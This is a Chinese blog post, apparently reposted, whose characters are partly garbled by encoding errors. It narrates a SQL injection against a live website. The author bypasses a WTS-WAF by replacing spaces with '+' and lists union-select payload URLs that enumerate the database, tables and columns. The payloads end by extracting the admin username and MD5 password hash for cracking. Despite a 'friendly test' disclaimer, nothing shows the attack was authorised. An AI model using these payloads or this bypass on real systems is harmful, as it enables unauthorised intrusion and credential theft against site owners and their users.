1.前言

??本人在做完測(cè)試了，所保留的信息均已刪除且未保留，只是友好的測(cè)試，并非有意為之。若侵權(quán)請(qǐng)聯(lián)系我進(jìn)行刪帖。

2.測(cè)試流程

2.1.發(fā)現(xiàn)漏洞

??這里發(fā)現(xiàn)漏洞也是通過(guò)URL來(lái)進(jìn)行判斷的，發(fā)現(xiàn)存在?id=22，那么就激情我的測(cè)試的興趣了，但是and 1=2–+上來(lái)就給我干出了WAF，然后這里就需要考慮如何繞過(guò)WAF了。

2.1.1.正常頁(yè)面

??這里可以看到頁(yè)面是正常的。

2.1.2.WAF警告

??通過(guò)頁(yè)面發(fā)現(xiàn)，被WAF警告了，同時(shí)也顯示了該WAF為WTS，那么就簡(jiǎn)單了上網(wǎng)上找一下，WTS-WAF繞過(guò)方式。但是呢，之前也學(xué)過(guò)就沒(méi)有立即去找相關(guān)的繞過(guò)方式，采用的是+號(hào)代替空格進(jìn)行測(cè)試。

2.1.3.非正常頁(yè)面

??這里也是很棒，竟然使用+號(hào)代替空格真能繞過(guò)，那么就可以繼續(xù)向下測(cè)試了。

2.2.判斷字段數(shù)

??前面我們通過(guò)+號(hào)替換空格繞過(guò)了，那么下面我們就要接著測(cè)試了。通過(guò)order by來(lái)測(cè)試字段數(shù)。這里截圖為了方便，就直接截圖下面的信息，上面的就不截圖了。

2.2.1.非正常頁(yè)面

??這里我們測(cè)試到order by 22–+的時(shí)候，出現(xiàn)報(bào)錯(cuò)了，那么就可以證明字段數(shù)為21。

URL：http://www.XXXXX.com/XXXX.php?id=22+order+by+22--+

2.2.2.正常頁(yè)面

??這里我們輸入21的時(shí)候頁(yè)面正常了，只是和正常的頁(yè)面還是有點(diǎn)區(qū)別。

URL：http://www.XXXXX.com/XXXXX.php?id=22+order+by+21--+

2.3.判斷回顯位

??到這里我們就需要判斷回顯位是哪里了。使用union select繼續(xù)測(cè)試。
??這里通過(guò)測(cè)試回顯位是7，那么就可以利用這個(gè)7來(lái)進(jìn)行下面的測(cè)試。

URL：http://www.XXXX.com/XXXX.php?id=-22+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+

2.4.信息收集

??這里我們主要收集數(shù)據(jù)庫(kù)名，和數(shù)據(jù)庫(kù)版本，通過(guò)頁(yè)面出現(xiàn)的報(bào)錯(cuò)，也能夠了解到，使用的是mysql數(shù)據(jù)庫(kù)。

2.4.1.數(shù)據(jù)庫(kù)版本

??這里我們得到的數(shù)據(jù)庫(kù)版本是：5.7.37。

URL：http://www.XXXX.com/XXXX.php?id=-22+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21--+#

2.4.2.數(shù)據(jù)庫(kù)名

??這里我們得到的數(shù)據(jù)庫(kù)名是：ahshyydz。

URL：http://www.XXXX.com/XXXX.php?id=-22+union+select+1,2,3,4,5,6,database(),8,9,10,11,12,13,14,15,16,17,18,19,20,21--+#

2.5.判斷數(shù)據(jù)庫(kù)表

??既然我們獲取到了數(shù)據(jù)庫(kù)名以及版本，那么我們就可以使用mysql大于5.0版本中的特性來(lái)獲取數(shù)據(jù)。

2.5.1.WAF告警

??本以為到這里能夠成功過(guò)去的，結(jié)果又出現(xiàn)告警，后來(lái)通過(guò)查詢(xún)文章以及手動(dòng)測(cè)試發(fā)現(xiàn)是由于group_concat 和括號(hào) () 在一起的時(shí)候才會(huì)觸發(fā)攔截。那么沒(méi)辦法只有一個(gè)一個(gè)測(cè)試了。

URL：http://www.XXXXXXX.com/XXXXX.php?id=-22+union+select+1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20information_schema.tables+where+table_schema=%22ahshyydz%22--+

2.5.2.獲取表

??這里我們就只能使用limit一個(gè)一個(gè)測(cè)試了，這里我們成功獲取到第一個(gè)表，但是向后測(cè)試發(fā)現(xiàn)不止一個(gè)表，為了方便我們使用burp suite進(jìn)行測(cè)試。

URL：http://www.XXXXX.com/XXXX.php?id=-22+union+select+1,2,3,4,5,6,table_name,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.tables+where+table_schema=%22ahshyydz%22+limit+0,1--+

2.5.3.burp suite測(cè)試

??這里我們使用軟件自動(dòng)加數(shù)字來(lái)進(jìn)行爆破。

2.5.4.表名稱(chēng)

??這里我們通過(guò)測(cè)試得到了很多的表，為了避免信息泄露，這里我就挑選幾個(gè)疑似賬號(hào)密碼的表來(lái)測(cè)試。

表名：admin_authority、admin_login、admininfo

2.6.判斷數(shù)據(jù)庫(kù)列

??到這里我們就要進(jìn)行數(shù)據(jù)庫(kù)的列進(jìn)行判斷了，之前我們得知使用group_concat會(huì)被檢測(cè)，既然這樣，那么我們還是一個(gè)一個(gè)測(cè)試。
??這里依舊使用我們的工具進(jìn)行測(cè)試，這里就不演示過(guò)程了，直接上結(jié)果吧，這里我們獲取到username與passwd表，其它的表我們不管。

URL：http://www.XXXX.com/XXXX.php?id=-22+union+select+1,2,3,4,5,6,column_name,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.columns+where+table_name=%22admininfo%22+limit+0,1--+

2.7.獲取數(shù)據(jù)

??這里我們就獲取到表與列了，那么就可以進(jìn)行數(shù)據(jù)獲取了，而獲取數(shù)據(jù)的辦法同樣是這樣操作。

2.7.1.賬戶(hù)

??這里由于顯示位只有一個(gè)就先測(cè)試賬戶(hù)吧，這里結(jié)果測(cè)試只有一個(gè)admin賬戶(hù)。

URL：http://www.XXXX.com/XXXX.php?id=-22+union+select+1,2,3,4,5,6,username,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from%20admininfo+limit+0,1--+

2.7.2.密碼

??這里賬戶(hù)就一個(gè)，那么密碼應(yīng)該也就是一個(gè)，這里我們只測(cè)試一個(gè)吧，并且這個(gè)密碼還是md5加密，這里我們找個(gè)平臺(tái)進(jìn)行解密即可。

URL：http://www.XXX.com/XXXX.php?id=-22+union+select+1,2,3,4,5,6,passwd,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from%20admininfo+limit+0,1--+

3.總結(jié)

??其實(shí)這個(gè)網(wǎng)站主要的困難就是需要繞WAF，通常想這類(lèi)的WAF在百度搜一搜都會(huì)有相關(guān)的繞過(guò)方式的。文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-477787.html

到了這里，關(guān)于實(shí)戰(zhàn)繞過(guò)WTS-WAF的SQL注入的文章就介紹完了。如果您還想了解更多內(nèi)容，請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！